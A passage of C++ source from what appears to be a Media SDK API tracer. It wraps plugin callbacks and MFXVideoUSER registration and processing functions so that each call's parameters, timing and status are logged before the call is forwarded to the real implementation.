(fmfxPlugin_Submit)pCtx->callbacks[emfxPlugin_Submit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (task) Log::WriteLog(context.dump("task", *task)); Timer t; mfxStatus status = (*proc) (pthis, in, in_num, out, out_num, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::Submit called"); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxPlugin::Submit(" + elapsed + ", " + 
context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_Execute(mfxHDL _pthis, mfxThreadTask task, mfxU32 uid_p, mfxU32 uid_a) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_Execute_tracer][1]; Log::WriteLog("callback: mfxPlugin::Execute(mfxHDL pthis=" + ToString(pthis) + ", mfxThreadTask task=" + ToString(task) + ", mfxU32 uid_p=" + ToString(uid_p) + ", mfxU32 uid_a=" + ToString(uid_a) + ") +"); fmfxPlugin_Execute proc = (fmfxPlugin_Execute)pCtx->callbacks[emfxPlugin_Execute_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); Timer t; mfxStatus status = (*proc) (pthis, task, uid_p, uid_a); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::Execute called"); Log::WriteLog("callback: mfxPlugin::Execute(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_FreeResources(mfxHDL _pthis, mfxThreadTask task, mfxStatus sts) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_FreeResources_tracer][1]; Log::WriteLog("callback: mfxPlugin::FreeResources(mfxHDL pthis=" + ToString(pthis) + ", mfxThreadTask task=" + ToString(task) + ", mfxStatus sts=" + ToString(sts) + ") +"); fmfxPlugin_FreeResources proc = (fmfxPlugin_FreeResources)pCtx->callbacks[emfxPlugin_FreeResources_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); Timer t; mfxStatus status = (*proc) (pthis, task, sts); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::FreeResources called"); Log::WriteLog("callback: mfxPlugin::FreeResources(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } inline bool IsVPPPlugin(mfxLoader::Plugin* pCtx) { return ((mfxU8*)pCtx - (mfxU8*)pCtx->pLoaderBase) == ((mfxU8*)pCtx->pLoaderBase - (mfxU8*)&pCtx->pLoaderBase->plugin[MFX_PLUGINTYPE_VIDEO_VPP]); } mfxStatus mfxVideoCodecPlugin_Query(mfxHDL _pthis, mfxVideoParam *in, mfxVideoParam *out) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_Query_tracer][1]; context.context = IsVPPPlugin(pCtx) ? 
DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::Query(mfxHDL pthis=" + ToString(pthis) + ", mfxVideoParam *in=" + ToString(in) + ", mfxVideoParam *out=" + ToString(out) + ") +"); fmfxVideoCodecPlugin_Query proc = (fmfxVideoCodecPlugin_Query)pCtx->callbacks[emfxVideoCodecPlugin_Query_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (in) Log::WriteLog(context.dump("in", *in)); if (out) Log::WriteLog(context.dump("out", *out)); Timer t; mfxStatus status = (*proc) (pthis, in, out); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::Query called"); if (out) Log::WriteLog(context.dump("out", *out)); Log::WriteLog("callback: mfxVideoCodecPlugin::Query(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_QueryIOSurf(mfxHDL _pthis, mfxVideoParam *par, mfxFrameAllocRequest *in, mfxFrameAllocRequest *out) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_QueryIOSurf_tracer][1]; context.context = IsVPPPlugin(pCtx) ? DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::QueryIOSurf(mfxHDL pthis=" + ToString(pthis) + ", mfxVideoParam *par=" + ToString(par) + ", mfxFrameAllocRequest *in=" + ToString(in) + ", mfxFrameAllocRequest *out=" + ToString(out) + ") +"); fmfxVideoCodecPlugin_QueryIOSurf proc = (fmfxVideoCodecPlugin_QueryIOSurf)pCtx->callbacks[emfxVideoCodecPlugin_QueryIOSurf_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); if (in) Log::WriteLog(context.dump("in", *in)); if (out) Log::WriteLog(context.dump("out", *out)); Timer t; mfxStatus status = (*proc) (pthis, par, in, out); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::QueryIOSurf called"); if (in) Log::WriteLog(context.dump("in", *in)); if (out) Log::WriteLog(context.dump("out", *out)); Log::WriteLog("callback: mfxVideoCodecPlugin::QueryIOSurf(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_Init(mfxHDL _pthis, mfxVideoParam *par) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_Init_tracer][1]; context.context = IsVPPPlugin(pCtx) ? 
DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::Init(mfxHDL pthis=" + ToString(pthis) + ", mfxVideoParam *par" + ToString(par) + ") +"); fmfxVideoCodecPlugin_Init proc = (fmfxVideoCodecPlugin_Init)pCtx->callbacks[emfxVideoCodecPlugin_Init_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::Init called"); Log::WriteLog("callback: mfxVideoCodecPlugin::Init(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_Reset(mfxHDL _pthis, mfxVideoParam *par) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_Reset_tracer][1]; context.context = IsVPPPlugin(pCtx) ? DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::Reset(mfxHDL pthis=" + ToString(pthis) + ", mfxVideoParam *par" + ToString(par) + ") +"); fmfxVideoCodecPlugin_Reset proc = (fmfxVideoCodecPlugin_Reset)pCtx->callbacks[emfxVideoCodecPlugin_Reset_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::Reset called"); Log::WriteLog("callback: mfxVideoCodecPlugin::Reset(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_Close(mfxHDL _pthis) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_Close_tracer][1]; context.context = IsVPPPlugin(pCtx) ? DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::Close(mfxHDL pthis=" + ToString(pthis) + ") +"); fmfxVideoCodecPlugin_Close proc = (fmfxVideoCodecPlugin_Close)pCtx->callbacks[emfxVideoCodecPlugin_Close_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); Timer t; mfxStatus status = (*proc) (pthis); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::Close called"); Log::WriteLog("callback: mfxVideoCodecPlugin::Close(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_GetVideoParam(mfxHDL _pthis, mfxVideoParam *par) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_GetVideoParam_tracer][1]; context.context = IsVPPPlugin(pCtx) ? 
DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::GetVideoParam(mfxHDL pthis=" + ToString(pthis) + ", mfxVideoParam *par" + ToString(par) + ") +"); fmfxVideoCodecPlugin_GetVideoParam proc = (fmfxVideoCodecPlugin_GetVideoParam)pCtx->callbacks[emfxVideoCodecPlugin_GetVideoParam_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::GetVideoParam called"); if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("callback: mfxVideoCodecPlugin::GetVideoParam(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_EncodeFrameSubmit(mfxHDL _pthis, mfxEncodeCtrl *ctrl, mfxFrameSurface1 *surface, mfxBitstream *bs, mfxThreadTask *task) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_EncodeFrameSubmit_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::EncodeFrameSubmit(mfxHDL pthis=" + ToString(pthis) + ", mfxEncodeCtrl *ctrl=" + ToString(ctrl) + ", mfxFrameSurface1 *surface=" + ToString(surface) + ", mfxBitstream *bs=" + ToString(bs) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxVideoCodecPlugin_EncodeFrameSubmit proc = (fmfxVideoCodecPlugin_EncodeFrameSubmit)pCtx->callbacks[emfxVideoCodecPlugin_EncodeFrameSubmit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (ctrl) Log::WriteLog(context.dump("ctrl", *ctrl)); if (surface) Log::WriteLog(context.dump("surface", *surface)); if (bs) Log::WriteLog(context.dump("bs", *bs)); if (task) Log::WriteLog(context.dump("bs", *task)); Timer t; mfxStatus status = (*proc) (pthis, ctrl, surface, bs, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::EncodeFrameSubmit called"); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxVideoCodecPlugin::EncodeFrameSubmit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_DecodeHeader(mfxHDL _pthis, mfxBitstream *bs, mfxVideoParam *par) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_DecodeHeader_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::DecodeHeader(mfxHDL pthis=" + ToString(pthis) + ", mfxBitstream *bs=" + ToString(bs) + ", mfxVideoParam *par=" + ToString(par) + ") +"); fmfxVideoCodecPlugin_DecodeHeader proc = (fmfxVideoCodecPlugin_DecodeHeader)pCtx->callbacks[emfxVideoCodecPlugin_DecodeHeader_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (bs) Log::WriteLog(context.dump("bs", *bs)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, bs, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> 
callback: mfxVideoCodecPlugin::DecodeHeader called"); if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("callback: mfxVideoCodecPlugin::DecodeHeader(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_GetPayload(mfxHDL _pthis, mfxU64 *ts, mfxPayload *payload) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_GetPayload_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::GetPayload(mfxHDL pthis=" + ToString(pthis) + ", mfxU64 *ts=" + ToString(ts) + ", mfxPayload *payload=" + ToString(payload) + ") +"); fmfxVideoCodecPlugin_GetPayload proc = (fmfxVideoCodecPlugin_GetPayload)pCtx->callbacks[emfxVideoCodecPlugin_GetPayload_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (ts) Log::WriteLog("ts" + ToString(*ts)); if (payload) Log::WriteLog(context.dump("payload", *payload)); Timer t; mfxStatus status = (*proc) (pthis, ts, payload); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::GetPayload called"); if (ts) Log::WriteLog("ts" + ToString(*ts)); if (payload) Log::WriteLog(context.dump("par", *payload)); Log::WriteLog("callback: mfxVideoCodecPlugin::GetPayload(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_DecodeFrameSubmit(mfxHDL _pthis, mfxBitstream *bs, mfxFrameSurface1 *surface_work, mfxFrameSurface1 **surface_out, mfxThreadTask *task) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_DecodeFrameSubmit_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::DecodeFrameSubmit(mfxHDL pthis=" + ToString(pthis) + ", mfxBitstream *bs=" + ToString(bs) + ", mfxFrameSurface1 *surface_work=" + ToString(surface_work) + ", mfxFrameSurface1 **surface_out=" + ToString(surface_out) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxVideoCodecPlugin_DecodeFrameSubmit proc = (fmfxVideoCodecPlugin_DecodeFrameSubmit)pCtx->callbacks[emfxVideoCodecPlugin_DecodeFrameSubmit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (bs) Log::WriteLog(context.dump("bs", *bs)); if (surface_work) Log::WriteLog(context.dump("surface_work", *surface_work)); if (surface_out && *surface_out) Log::WriteLog(context.dump("surface_out", **surface_out)); Timer t; mfxStatus status = (*proc) (pthis, bs, surface_work, surface_out, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::DecodeFrameSubmit called"); if (surface_out && *surface_out) Log::WriteLog(context.dump("surface_out", **surface_out)); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxVideoCodecPlugin::DecodeFrameSubmit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus 
mfxVideoCodecPlugin_VPPFrameSubmit(mfxHDL _pthis, mfxFrameSurface1 *in, mfxFrameSurface1 *out, mfxExtVppAuxData *aux, mfxThreadTask *task) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_VPPFrameSubmit_tracer][1]; context.context = DUMPCONTEXT_VPP; Log::WriteLog("callback: mfxVideoCodecPlugin::VPPFrameSubmit(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameSurface1 *in=" + ToString(in) + ", mfxFrameSurface1 *out=" + ToString(out) + ", mfxExtVppAuxData *aux=" + ToString(aux) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxVideoCodecPlugin_VPPFrameSubmit proc = (fmfxVideoCodecPlugin_VPPFrameSubmit)pCtx->callbacks[emfxVideoCodecPlugin_VPPFrameSubmit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (in) Log::WriteLog(context.dump("in", *in)); if (out) Log::WriteLog(context.dump("out", *out)); Timer t; mfxStatus status = (*proc) (pthis, in, out, aux, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::VPPFrameSubmit called"); if (out) Log::WriteLog(context.dump("out", *out)); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxVideoCodecPlugin::VPPFrameSubmit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_VPPFrameSubmitEx(mfxHDL _pthis, mfxFrameSurface1 *in, mfxFrameSurface1 *surface_work, mfxFrameSurface1 **surface_out, mfxThreadTask *task) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_VPPFrameSubmitEx_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::VPPFrameSubmitEx(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameSurface1 *in=" + ToString(in) + ", mfxFrameSurface1 *surface_work=" + ToString(surface_work) + ", mfxFrameSurface1 **surface_out=" + ToString(surface_out) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxVideoCodecPlugin_VPPFrameSubmitEx proc = (fmfxVideoCodecPlugin_VPPFrameSubmitEx)pCtx->callbacks[emfxVideoCodecPlugin_VPPFrameSubmitEx_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (in) Log::WriteLog(context.dump("in", *in)); if (surface_work) Log::WriteLog(context.dump("surface_work", *surface_work)); if (surface_out && *surface_out) Log::WriteLog(context.dump("surface_out", **surface_out)); Timer t; mfxStatus status = (*proc) (pthis, in, surface_work, surface_out, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::VPPFrameSubmitEx called"); if (surface_out && *surface_out) Log::WriteLog(context.dump("surface_out", **surface_out)); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxVideoCodecPlugin::VPPFrameSubmitEx(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_ENCFrameSubmit(mfxHDL _pthis, mfxENCInput *in, mfxENCOutput *out, mfxThreadTask *task) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) 
return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_ENCFrameSubmit_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::ENCFrameSubmit(mfxHDL pthis=" + ToString(pthis) + ", mfxENCInput *in=" + ToString(in) + ", mfxENCOutput *out=" + ToString(out) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxVideoCodecPlugin_ENCFrameSubmit proc = (fmfxVideoCodecPlugin_ENCFrameSubmit)pCtx->callbacks[emfxVideoCodecPlugin_ENCFrameSubmit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); Timer t; mfxStatus status = (*proc) (pthis, in, out, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::ENCFrameSubmit called"); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxVideoCodecPlugin::ENCFrameSubmit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } #endif //TRACE_CALLBACKS mfxStatus MFXVideoUSER_Register(mfxSession session, mfxU32 type, const mfxPlugin *par) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; Log::WriteLog("function: MFXVideoUSER_Register(mfxSession session=" + ToString(session) + ", mfxU32 type=" + ToString(type) + ", mfxPlugin *par=" + ToString(par) + ") +"); mfxLoader *loader = (mfxLoader*) session; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxFunctionPointer proc = loader->table[eMFXVideoUSER_Register_tracer]; if (!proc) return MFX_ERR_INVALID_HANDLE; session = loader->session; Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxU32("type", type)); if (par) Log::WriteLog(context.dump("par", *par)); #if TRACE_CALLBACKS INIT_CALLBACK_BACKUP(loader->plugin[type].callbacks); mfxPlugin proxyPar; if (par && type < (sizeof(loader->plugin) / sizeof(loader->plugin[0]))) { proxyPar = *par; par = &proxyPar; if (loader->plugin[type].pLoaderBase != loader) loader->plugin[type].pLoaderBase = loader; SET_CALLBACK(mfxPlugin, proxyPar., PluginInit, proxyPar.pthis); SET_CALLBACK(mfxPlugin, proxyPar., PluginClose, proxyPar.pthis); SET_CALLBACK(mfxPlugin, proxyPar., GetPluginParam, proxyPar.pthis); SET_CALLBACK(mfxPlugin, proxyPar., Execute, proxyPar.pthis); SET_CALLBACK(mfxPlugin, proxyPar., FreeResources, proxyPar.pthis); if (type == MFX_PLUGINTYPE_VIDEO_GENERAL) { SET_CALLBACK(mfxPlugin, proxyPar., Submit, proxyPar.pthis); } else { SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, Query, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, QueryIOSurf, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, Init, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, Reset, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, Close, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, GetVideoParam, proxyPar.pthis); switch (type) { case MFX_PLUGINTYPE_VIDEO_DECODE: SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, DecodeHeader, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, GetPayload, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, DecodeFrameSubmit, proxyPar.pthis); break; case MFX_PLUGINTYPE_VIDEO_ENCODE: SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, EncodeFrameSubmit, proxyPar.pthis); break; case MFX_PLUGINTYPE_VIDEO_VPP: SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, 
VPPFrameSubmit, proxyPar.pthis); SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, VPPFrameSubmitEx, proxyPar.pthis); break; case MFX_PLUGINTYPE_VIDEO_ENC: SET_CALLBACK(mfxVideoCodecPlugin, proxyPar.Video->, ENCFrameSubmit, proxyPar.pthis); break; default: break; } } if (proxyPar.pthis) proxyPar.pthis = &loader->plugin[type]; } #endif //TRACE_CALLBACKS Timer t; mfxStatus status = (*(fMFXVideoUSER_Register) proc)(session, type, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> MFXVideoUSER_Register called"); //No need to dump input-only parameters twice!!! //Log::WriteLog(context.dump("session", session)); //Log::WriteLog(context.dump_mfxU32("type", type)); //if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("function: MFXVideoUSER_Register(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); #if TRACE_CALLBACKS if (status < MFX_ERR_NONE) callbacks.RevertAll(); #endif //TRACE_CALLBACKS return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus MFXVideoUSER_Unregister(mfxSession session, mfxU32 type) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; Log::WriteLog("function: MFXVideoUSER_Unregister(mfxSession session=" + ToString(session) + ", mfxU32 type=" + ToString(type) + ", mfxPlugin *par=" + ") +"); mfxLoader *loader = (mfxLoader*) session; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxFunctionPointer proc = loader->table[eMFXVideoUSER_Unregister_tracer]; if (!proc) return MFX_ERR_INVALID_HANDLE; session = loader->session; Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxU32("type", type)); Timer t; mfxStatus status = (*(fMFXVideoUSER_Unregister) proc) (session, type); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> MFXVideoUSER_Unregister called"); Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxU32("type", type)); Log::WriteLog("function: MFXVideoUSER_Unregister(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus MFXVideoUSER_ProcessFrameAsync(mfxSession session, const mfxHDL *in, mfxU32 in_num, const mfxHDL *out, mfxU32 out_num, mfxSyncPoint *syncp) { try { if (Log::GetLogLevel() >= LOG_LEVEL_FULL) // call with logging { DumpContext context; context.context = DUMPCONTEXT_MFX; TracerSyncPoint sp; if (syncp) { sp.syncPoint = (*syncp); } else { sp.syncPoint = NULL; } Log::WriteLog("function: MFXVideoUSER_ProcessFrameAsync(mfxSession session=, const mfxHDL *in, mfxU32 in_num, const mfxHDL *out, mfxU32 out_num, mfxSyncPoint *syncp) +"); mfxLoader *loader = (mfxLoader*) session; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxFunctionPointer proc = loader->table[eMFXVideoUSER_ProcessFrameAsync_tracer]; if (!proc) return MFX_ERR_INVALID_HANDLE; session = loader->session; Log::WriteLog(context.dump("session", session)); Log::WriteLog(context.dump_mfxHDL("in", in)); Log::WriteLog(context.dump_mfxU32("in_num", in_num)); Log::WriteLog(context.dump_mfxHDL("out", out)); Log::WriteLog(context.dump_mfxU32("out_num", out_num)); Log::WriteLog(context.dump("syncp", sp.syncPoint)); Timer t; mfxStatus status = (*(fMFXVideoUSER_ProcessFrameAsync) proc) (session, in, in_num, out, 